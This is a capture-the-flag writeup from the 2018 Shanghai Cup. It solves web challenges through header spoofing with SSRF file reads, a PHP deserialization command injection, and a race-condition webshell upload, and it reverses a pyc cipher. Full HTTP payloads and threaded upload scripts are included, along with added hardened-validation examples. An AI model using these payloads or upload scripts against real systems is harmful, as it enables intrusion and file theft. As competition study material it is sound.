2018 Shanghai Cup Writeups (Partial)


title: 2018上海杯WP
date: 2018-11-05 20:17:30
tags: [WP]


WEB-1

Challenge: what are you doing?

Visiting the web1 link shows "what are you doing?". Following the usual approach, we look at the page source and find a robots.txt.

what are you doing?

Visiting robots.txt reveals two PHP files:

source.php
flag.php

Visiting flag.php gives a blank page; visiting source.php returns "you need to login as admin!". We look at the source of source.php.

you need to login as admin!

So we need to log in as admin; we POST admin=1.

you need to login as admin!only 127.0.0.1 can get the flag!!

We need to come from 127.0.0.1, so we add the header x-client-ip:127.0.0.1 to the request and send it again.

you need to login as admin!you need post url: http://www.ichunqiu.com

Following the hint, we POST the data below and get back an image URL, but the image does not display. Downloading it, we find it is actually HTML: the i春秋 (ichunqiu) home page.


We actually got stuck here for a long time. With url=https://www.ichunqiu.com followed by a path, the response is the page source at that path, so we tried appending paths to the URL to download the source of flag.php, but got nowhere. A teammate eventually thought of traversing directories instead: point the url at the local file flag.php, download the returned "image", and that is the source of flag.php. The payload is as follows:

POST /source.php HTTP/1.1
Host: a5c3e1b00225407882f0c49146799bc7264bdbab35e64bc6.game.ichunqiu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
x-client-ip:127.0.0.1
Referer: http://a5c3e1b00225407882f0c49146799bc7264bdbab35e64bc6.game.ichunqiu.com/source.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 63
Connection: keep-alive
Cookie: Hm_lvt_2d0601bd28de7d49818249cf35d95943=1541299543; UM_distinctid=16554da401239b-0683daa189f84b-4c312878-144000-16554da401358; pgv_pvi=8097842176; ci_session=b34f5f4fa25e7d36b3c6f0d3efae40f090604014; chkphone=acWxNpxhQpDiAchhNuSnEqyiQuDIO0O0O; pgv_si=s5565527040; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1541318560; Hm_lvt_9104989ce242a8e03049eaceca950328=1541299549; Hm_lpvt_9104989ce242a8e03049eaceca950328=1541299549; Hm_lvt_1a32f7c660491887db0960e9c314b022=1541299549; Hm_lpvt_1a32f7c660491887db0960e9c314b022=1541299549
Upgrade-Insecure-Requests: 1

admin=1&url=file://www.ichunqiu.com/../../var/www/html/flag.php

Finally, we rename the downloaded image to a .php file and get the flag.
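As an added defensive example (constructed here, not the challenge's source.php), this re-creates the three checks the writeup ran into with the two weaknesses closed: the client address is taken from the TCP peer instead of an x-client-ip header, and the url is parsed so that only http(s) URLs whose host is exactly www.ichunqiu.com pass, whereas a substring match would have accepted the file://www.ichunqiu.com/../../var/www/html/flag.php payload. The function names are assumptions; the returned messages are the ones the page shows, and the final fetch is represented by the returned string.

```python
from urllib.parse import urlsplit

ALLOWED_HOST = "www.ichunqiu.com"

def url_is_allowed(url: str) -> bool:
    """Parse the URL and check scheme and host, instead of looking for the
    hostname somewhere in the string.  A substring test accepts
    file://www.ichunqiu.com/../../var/www/html/flag.php; this does not."""
    try:
        parts = urlsplit(url)
    except ValueError:
        return False
    if parts.scheme not in ("http", "https"):
        return False
    # hostname is lower-cased and stripped of userinfo and port by urlsplit
    if parts.hostname != ALLOWED_HOST:
        return False
    # evil@www.ichunqiu.com would still parse with the right hostname
    if parts.username is not None or parts.password is not None:
        return False
    return True

def handle(peer_addr: str, headers: dict, form: dict) -> str:
    """Hardened re-creation (constructed, not the challenge's code) of the
    checks seen in the writeup, returning the same messages."""
    if form.get("admin") != "1":
        return "you need to login as admin!"
    # Only the address the TCP connection actually came from counts;
    # x-client-ip and similar headers are client-controlled and ignored.
    if peer_addr != "127.0.0.1":
        return "only 127.0.0.1 can get the flag!!"
    url = form.get("url", "")
    if not url_is_allowed(url):
        return "you need post url: http://www.ichunqiu.com"
    return "fetching " + url  # the real handler would fetch the page here
```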

web-2

Challenge: Can you hack me?

This challenge is a .swp file leak; we download the .swp file and audit the source.


The .swp file is recovered on Linux with vi -r index.php.swp.

Then the code audit begins...

<?php
// The head of the file was lost in the recovered copy; the class name and the
// private visibility of the two properties are reconstructed from the
// serialized payload used later (O:4:"come" with %00come%00-prefixed names).
class come {
    private $method;
    private $args;
    function __construct($method, $args){
        $this->method = $method;
        $this->args = $args;
    }
    // Runs on unserialize(): every argument goes through waf()
    function __wakeup(){
        foreach($this->args as $k => $v) {
            $this->args[$k] = $this->waf(trim($v));
        }
    }
    // Blacklist filter: strip some shell metacharacters, then remove "flag" once
    function waf($str){
        $str=preg_replace("/[<>*;|?\n ]/","",$str);
        $str=str_replace('flag','',$str);
        return $str;
    }
    // $host is interpolated straight into a shell command
    function echo($host){
        system("echo $host");
    }
    // Runs when the object is destroyed: calls $this->echo() with the filtered args
    function __destruct(){
        if (in_array($this->method, array("echo"))) {
            call_user_func_array(array($this, $this->method), $this->args);
        }
    }
}

$first='hi';
$var='var';
$bbb='bbb';
$ccc='ccc';
$i=1;
// Only the first GET parameter is assigned, as a variable variable
foreach($_GET as $key => $value) {
    if($i===1)
    {
        $i++;
        $$key = $value;
    }
    else{break;}
}
if($first==="doller")
{
    // parse_str() without a result array writes $var, $bbb, $ccc from a
    @parse_str($_GET['a']);
    if($var==="give")
    {
        if($bbb==="me")
        {
            if($ccc==="flag")
            {
                echo "welcome!";
                $come=@$_POST['come'];
                unserialize($come);
            }
        }
        else
        {
            echo "think about it";
        }
    }
    else
    {
        echo "NO";
    }
}
else
{
    echo "Can you hack me?";
}
?>

From the code we can see that we first have to get past the GET parameter checks and then reach the unserialize() call. The GET bypass is as follows:

?first=doller&a=var%3dgive%26bbb%3dme%26ccc%3dflag

Next we think about getting past the deserialization defenses. From the challenge code, the __wakeup method runs a waf that filters characters. So we try CVE-2016-7124, found via Google: when the property count declared in the serialized string is larger than the object's real number of properties, __wakeup is skipped. This worked in local testing but not against the remote target... painful. Back to code auditing: slashes are not filtered, and spaces can be replaced with $IFS. We also learned from these references:

https://www.knowsec.net/archives/341/

https://blog.csdn.net/qq_42196196/article/details/81217375?utm_source=blogkpcl1

So the payload:

POST /?first=doller&a=var%3dgive%26bbb%3dme%26ccc%3dflag HTTP/1.1
Host: f927629d24dd4e0b84ef5e917d89dba041b03b9deb3641d9.game.ichunqiu.com
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 127

come=O:4:"come":2:{s:12:"%00come%00method";s:4:"echo";s:10:"%00come%00args";a:2:{i:0;s:18:"`cat$IFS/flflagag`";i:1;s:3:"hjj";}}
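Added example, not code from the challenge: a Python re-creation of the recovered waf() that shows why the filter fails by construction. Python's str.replace, like PHP's str_replace, makes one left-to-right pass, so flflagag collapses to flag, and the character blacklist never covered $ or backticks. The hardened variant (function names are assumptions) does not strip anything: it validates the echo($host) argument against an allowlist of hostname characters and rejects everything else.

```python
import re

# Same character class as the challenge's preg_replace("/[<>*;|?\n ]/", ...)
BLACKLIST = re.compile(r"[<>*;|?\n ]")

def waf_as_written(s: str) -> str:
    """Re-creation of the recovered waf(): strip blacklisted characters, then
    delete the literal 'flag' in a single pass (as PHP str_replace does)."""
    s = BLACKLIST.sub("", s.strip())
    return s.replace("flag", "")

def waf_fixpoint(s: str) -> str:
    """Re-apply the same stripping until the string stops changing, so a
    keyword cannot be rebuilt from the remnants of one pass.  This closes the
    flflagag trick but still lets $IFS and backticks through: a blacklist
    only covers what its author thought of."""
    while True:
        out = waf_as_written(s)
        if out == s:
            return out
        s = out

HOSTNAME = re.compile(r"[A-Za-z0-9.-]{1,253}")

def host_or_none(s: str):
    """Allowlist validation for the echo($host) argument: accept only
    characters that occur in hostnames and return None for anything else.
    Nothing is 'cleaned', so there is no partial result to abuse."""
    return s if HOSTNAME.fullmatch(s) else None
```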

web-3

Opening the challenge, the source is given directly.

Race-condition upload of a shell

poc1

import threading
import requests

def send(num):
    url = "http://1f59ccd88b9d491db1b14abc6ff8642bbb50265d149e41f1.game.ichunqiu.com/"
    # url = "http://web3.shb.5am3"
    file_name = "file"
    file_upload_name = "5am3.php"
    f = open("5am3.php", "r")
    data = {
        "file[1]": "aaa",
        "file[]": "php",
        "hehe": "http://test2.5am3.com/test.php"
    }
    file = {
        file_name: (file_upload_name, f),
    }
    # print("2")
    try:
        req = requests.post(url, data, files=file)
        # print(req.text)
        if "@" in req.text:
            print("crack ok!")
    except Exception as e:
        print("1")
    finally:
        f.close()

def crack(threadNumber=5):
    threads = []
    for num in range(120, 121):
        threads.append(threading.Thread(target=send, args=(num,)))
    for thread in threads:
        thread.start()
        # wait until fewer than threadNumber threads are alive before starting the next
        while True:
            if len(threading.enumerate()) < threadNumber:
                break

while 1:
    crack()

# send(111)

poc2

import threading
import requests

def send(num):
    url = "http://1f59ccd88b9d491db1b14abc6ff8642bbb50265d149e41f1.game.ichunqiu.com/"
    # url = "http://web3.shb.5am3"
    file_name = "file"
    file_upload_name = "5am3.php"
    f = open("5am32.php", "r")
    data = {
        "file[1]": "aaa",
        "file[]": "php",
        "hehe": str(num) + ".php"
    }
    file = {
        file_name: (file_upload_name, f),
    }
    # print("2")
    try:
        req = requests.post(url, data, files=file)
        # print(req.text)
        if "@" in req.text:
            print("crack ok!")
    except Exception as e:
        print("1")
    finally:
        f.close()

def crack(threadNumber=20):
    threads = []
    for num in range(100, 900):
        threads.append(threading.Thread(target=send, args=(num,)))
    for thread in threads:
        thread.start()
        # wait until fewer than threadNumber threads are alive before starting the next
        while True:
            if len(threading.enumerate()) < threadNumber:
                break

while 1:
    crack()

# send(111)

payload:

POST / HTTP/1.1
Host: 1f59ccd88b9d491db1b14abc6ff8642bbb50265d149e41f1.game.ichunqiu.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://web3.shb.5am3/
Content-Type: multipart/form-data; boundary=---------------------------21022237801674110016436295918
Content-Length: 1107
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------21022237801674110016436295918
Content-Disposition: form-data; name="file"; filename="5am3.php"
Content-Type: text/php

@
-----------------------------21022237801674110016436295918
Content-Disposition: form-data; name="file[1]"

sssss.asd
-----------------------------21022237801674110016436295918
Content-Disposition: form-data; name="file[]"

php
-----------------------------21022237801674110016436295918
Content-Disposition: form-data; name="hehe"

/var/sandbox/2765d621af8a58b78b4d528bd5ef7f6b/config.php
-----------------------------21022237801674110016436295918
Content-Disposition: form-data; name="pass"

5am3
-----------------------------21022237801674110016436295918
Content-Disposition: form-data; name="kn0ck"

system("cat /flag");
-----------------------------21022237801674110016436295918--

MISC-easy py

The pyc file structure can be analyzed with 010 Editor: have it export a CSV, tidy the layout, fill in the Value column from the variable list 010 detected automatically, and infer the actual Python code from it. From that we infer the program's encryption logic and write a decryption program.

We can write the decryption script (cpp):

#include <iostream>
using namespace std;

int main()
{
    // Fill in the 15 encrypted bytes recovered from the pyc (not reproduced here).
    int cmp[15]={};
    int q=0;
    for(int i=0;i<15;i++)
    {
        for(int j=0;j<255;j++)
        {
            // Parentheses around the whole right-hand side are required: == binds
            // tighter than & and |, so without them only the first term is compared.
            if(cmp[q] == (((~j)&102)|(j&(-103))))
            {
                q=q+1;
                cout<<(char)j;
                break;
            }
        }
    }
    return 0;
}

Reversing shows the flag passes through two layers of encryption; since the computation is small, it can be solved directly by brute force.


Final flag: flag{W0w_y0u_m4st3r_C_p1us_p1us}
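Added example, not part of the writeup: the same brute force in Python, together with a check that the two layers tested in the C++ condition, (~j)&102 and j&(-103), combine to a plain j XOR 102 (since -103 is ~102), which is why every byte can be recovered independently. The ciphertext is constructed here by applying that transform to the flag the writeup reports; the real bytes from the pyc are not on the page.

```python
def two_layers(j: int) -> int:
    """The two operations the C++ loop tests: keep the bits of 102 that are
    clear in j, then OR in the bits of j outside 102 (-103 == ~102)."""
    return ((~j) & 102) | (j & (-103))

def same_as_xor(j: int) -> bool:
    """Together the two layers equal a single XOR with 102."""
    return two_layers(j) == (j ^ 102)

def encrypt(plaintext: str) -> list:
    # Constructed ciphertext for the demonstration, using the same transform
    return [two_layers(ord(ch)) for ch in plaintext]

def decrypt(cmp: list) -> str:
    """Brute force as in the C++ loop: for each encrypted byte, find the j in
    0..254 whose transform matches and emit chr(j)."""
    out = []
    for c in cmp:
        for j in range(255):
            if two_layers(j) == c:
                out.append(chr(j))
                break
    return "".join(out)

FLAG = "flag{W0w_y0u_m4st3r_C_p1us_p1us}"   # flag reported in the writeup
CIPHERTEXT = encrypt(FLAG)                      # constructed, not from the pyc
```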
